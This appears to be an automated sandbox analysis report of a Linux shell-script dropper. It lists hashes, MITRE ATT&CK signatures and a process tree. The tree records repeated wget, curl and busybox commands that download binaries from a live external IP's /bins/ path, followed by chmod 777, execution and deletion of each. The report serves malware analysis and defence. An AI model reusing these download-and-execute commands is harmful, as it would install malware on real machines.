77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb

Analysis

max time kernel
12s
max time network
129s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20/11/2024, 02:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
Size

10KB
MD5

928ac3545f37f454486c6da121b1d8ad
SHA1

3046c6680906db848c9b0214b81114b98b1e3b37
SHA256

77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb
SHA512

241bccfebc8ff76545fe467db32188c4133a7ba498309511c1459a346da7cef42204de16806c6bf7a577ddab03058f539617394036727484a1e640dc90764e8e
SSDEEP

192:mpJrZ7BB997eSM7y+WT79/o9/Y9/h/S/+/kaz0z8zTA8aTXHdUdcddCmFXeXSX5X:AZx9E68h6CdCmVG65iCpkzaiHDg6CdC6

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1515	chmod
1564	chmod
1599	chmod
1669	chmod
1578	chmod
1676	chmod
1508	chmod
1522	chmod
1529	chmod
1557	chmod
1697	chmod
1592	chmod
1613	chmod
1620	chmod
1655	chmod
1662	chmod
1690	chmod
1543	chmod
1571	chmod
1606	chmod
1634	chmod
1648	chmod
1641	chmod
1536	chmod
1550	chmod
1585	chmod
1627	chmod
1683	chmod

Executes dropped EXE 28 IoCs

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1576	curl
1581	rm
1673	wget
1679	rm
1575	wget
1577	busybox
1579	Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
1674	curl
1675	busybox
1677	Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4	curl
File opened for modification	/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl	curl
File opened for modification	/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY	curl
File opened for modification	/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7	curl
File opened for modification	/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY	curl
File opened for modification	/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY	curl
File opened for modification	/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1	curl
File opened for modification	/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT	curl
File opened for modification	/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1	curl
File opened for modification	/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU	curl
File opened for modification	/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl	curl
File opened for modification	/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh	curl
File opened for modification	/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw	curl
File opened for modification	/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq	curl
File opened for modification	/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1	curl
File opened for modification	/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT	curl
File opened for modification	/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f	curl
File opened for modification	/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw	curl
File opened for modification	/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1	curl
File opened for modification	/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC	curl
File opened for modification	/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU	curl
File opened for modification	/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC	curl
File opened for modification	/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY	curl
File opened for modification	/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh	curl
File opened for modification	/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7	curl
File opened for modification	/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f	curl
File opened for modification	/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4	curl
File opened for modification	/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq	curl

/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
1⤵
PID:1500
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1501
- /usr/bin/wget
  wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  PID:1502
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  - Writes file to tmp directory
  PID:1503
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  PID:1504
- /bin/chmod
  chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  - File and Directory Permissions Modification
  PID:1508
- /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  ./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  - Executes dropped EXE
  PID:1509
- /bin/rm
  rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  PID:1511
- /usr/bin/wget
  wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  PID:1512
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  - Writes file to tmp directory
  PID:1513
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  PID:1514
- /bin/chmod
  chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  - File and Directory Permissions Modification
  PID:1515
- /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  ./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  - Executes dropped EXE
  PID:1516
- /bin/rm
  rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  PID:1518
- /usr/bin/wget
  wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  PID:1519
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  - Writes file to tmp directory
  PID:1520
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  PID:1521
- /bin/chmod
  chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  - File and Directory Permissions Modification
  PID:1522
- /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  ./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  - Executes dropped EXE
  PID:1523
- /bin/rm
  rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  PID:1525
- /usr/bin/wget
  wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  PID:1526
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  - Writes file to tmp directory
  PID:1527
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  PID:1528
- /bin/chmod
  chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  - File and Directory Permissions Modification
  PID:1529
- /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
  ./f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  - Executes dropped EXE
  PID:1530
- /bin/rm
  rm f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  PID:1532
- /usr/bin/wget
  wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  PID:1533
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  - Writes file to tmp directory
  PID:1534
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  PID:1535
- /bin/chmod
  chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  - File and Directory Permissions Modification
  PID:1536
- /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  ./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  - Executes dropped EXE
  PID:1537
- /bin/rm
  rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  PID:1539
- /usr/bin/wget
  wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  PID:1540
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  - Writes file to tmp directory
  PID:1541
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  PID:1542
- /bin/chmod
  chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  ./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  - Executes dropped EXE
  PID:1544
- /bin/rm
  rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  PID:1546
- /usr/bin/wget
  wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  PID:1547
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  PID:1549
- /bin/chmod
  chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  - File and Directory Permissions Modification
  PID:1550
- /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  ./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  - Executes dropped EXE
  PID:1551
- /bin/rm
  rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  PID:1553
- /usr/bin/wget
  wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  PID:1554
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  - Writes file to tmp directory
  PID:1555
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  PID:1556
- /bin/chmod
  chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  - File and Directory Permissions Modification
  PID:1557
- /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  ./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  - Executes dropped EXE
  PID:1558
- /bin/rm
  rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  PID:1560
- /usr/bin/wget
  wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  PID:1561
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  - Writes file to tmp directory
  PID:1562
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  PID:1563
- /bin/chmod
  chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  - File and Directory Permissions Modification
  PID:1564
- /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  ./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  - Executes dropped EXE
  PID:1565
- /bin/rm
  rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  PID:1567
- /usr/bin/wget
  wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  PID:1568
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  - Writes file to tmp directory
  PID:1569
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  PID:1570
- /bin/chmod
  chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  - File and Directory Permissions Modification
  PID:1571
- /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  ./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  - Executes dropped EXE
  PID:1572
- /bin/rm
  rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  PID:1574
- /usr/bin/wget
  wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - System Network Configuration Discovery
  PID:1575
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1576
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - System Network Configuration Discovery
  PID:1577
- /bin/chmod
  chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - File and Directory Permissions Modification
  PID:1578
- /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  ./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1579
- /bin/rm
  rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - System Network Configuration Discovery
  PID:1581
- /usr/bin/wget
  wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  PID:1582
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  - Writes file to tmp directory
  PID:1583
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  PID:1584
- /bin/chmod
  chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  - File and Directory Permissions Modification
  PID:1585
- /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  ./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  - Executes dropped EXE
  PID:1586
- /bin/rm
  rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  PID:1588
- /usr/bin/wget
  wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  PID:1589
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  - Writes file to tmp directory
  PID:1590
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  PID:1591
- /bin/chmod
  chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  ./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  - Executes dropped EXE
  PID:1593
- /bin/rm
  rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
  2⤵
  PID:1595
- /usr/bin/wget
  wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  PID:1596
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  - Writes file to tmp directory
  PID:1597
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  PID:1598
- /bin/chmod
  chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  - File and Directory Permissions Modification
  PID:1599
- /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  ./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  - Executes dropped EXE
  PID:1600
- /bin/rm
  rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
  2⤵
  PID:1602
- /usr/bin/wget
  wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  PID:1603
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  - Writes file to tmp directory
  PID:1604
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  PID:1605
- /bin/chmod
  chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  - File and Directory Permissions Modification
  PID:1606
- /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  ./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  - Executes dropped EXE
  PID:1607
- /bin/rm
  rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
  2⤵
  PID:1609
- /usr/bin/wget
  wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  PID:1610
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  - Writes file to tmp directory
  PID:1611
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  PID:1612
- /bin/chmod
  chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  - File and Directory Permissions Modification
  PID:1613
- /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  ./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  - Executes dropped EXE
  PID:1614
- /bin/rm
  rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
  2⤵
  PID:1616
- /usr/bin/wget
  wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  PID:1617
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  - Writes file to tmp directory
  PID:1618
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  PID:1619
- /bin/chmod
  chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  - File and Directory Permissions Modification
  PID:1620
- /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  ./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  - Executes dropped EXE
  PID:1621
- /bin/rm
  rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
  2⤵
  PID:1623
- /usr/bin/wget
  wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  PID:1624
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  - Writes file to tmp directory
  PID:1625
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  PID:1626
- /bin/chmod
  chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  - File and Directory Permissions Modification
  PID:1627
- /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
  ./f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  - Executes dropped EXE
  PID:1628
- /bin/rm
  rm f4er80WdZpB65CEraApSmbUBPranpIfNx7
  2⤵
  PID:1630
- /usr/bin/wget
  wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  PID:1631
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  - Writes file to tmp directory
  PID:1632
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  PID:1633
- /bin/chmod
  chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  - File and Directory Permissions Modification
  PID:1634
- /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  ./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  - Executes dropped EXE
  PID:1635
- /bin/rm
  rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
  2⤵
  PID:1637
- /usr/bin/wget
  wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  PID:1638
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  - Writes file to tmp directory
  PID:1639
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  PID:1640
- /bin/chmod
  chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  - File and Directory Permissions Modification
  PID:1641
- /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  ./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  - Executes dropped EXE
  PID:1642
- /bin/rm
  rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
  2⤵
  PID:1644
- /usr/bin/wget
  wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  PID:1645
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  - Writes file to tmp directory
  PID:1646
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  PID:1647
- /bin/chmod
  chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  - File and Directory Permissions Modification
  PID:1648
- /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  ./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  - Executes dropped EXE
  PID:1649
- /bin/rm
  rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
  2⤵
  PID:1651
- /usr/bin/wget
  wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  PID:1652
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  - Writes file to tmp directory
  PID:1653
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  PID:1654
- /bin/chmod
  chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  - File and Directory Permissions Modification
  PID:1655
- /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  ./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  - Executes dropped EXE
  PID:1656
- /bin/rm
  rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
  2⤵
  PID:1658
- /usr/bin/wget
  wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  PID:1659
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  - Writes file to tmp directory
  PID:1660
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  PID:1661
- /bin/chmod
  chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  - File and Directory Permissions Modification
  PID:1662
- /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  ./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  - Executes dropped EXE
  PID:1663
- /bin/rm
  rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
  2⤵
  PID:1665
- /usr/bin/wget
  wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  PID:1666
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  - Writes file to tmp directory
  PID:1667
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  PID:1668
- /bin/chmod
  chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  - File and Directory Permissions Modification
  PID:1669
- /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  ./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  - Executes dropped EXE
  PID:1670
- /bin/rm
  rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
  2⤵
  PID:1672
- /usr/bin/wget
  wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - System Network Configuration Discovery
  PID:1673
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1674
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - System Network Configuration Discovery
  PID:1675
- /bin/chmod
  chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - File and Directory Permissions Modification
  PID:1676
- /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  ./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1677
- /bin/rm
  rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
  2⤵
  - System Network Configuration Discovery
  PID:1679
- /usr/bin/wget
  wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  PID:1680
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  - Writes file to tmp directory
  PID:1681
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  PID:1682
- /bin/chmod
  chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  - File and Directory Permissions Modification
  PID:1683
- /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  ./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  - Executes dropped EXE
  PID:1684
- /bin/rm
  rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
  2⤵
  PID:1686
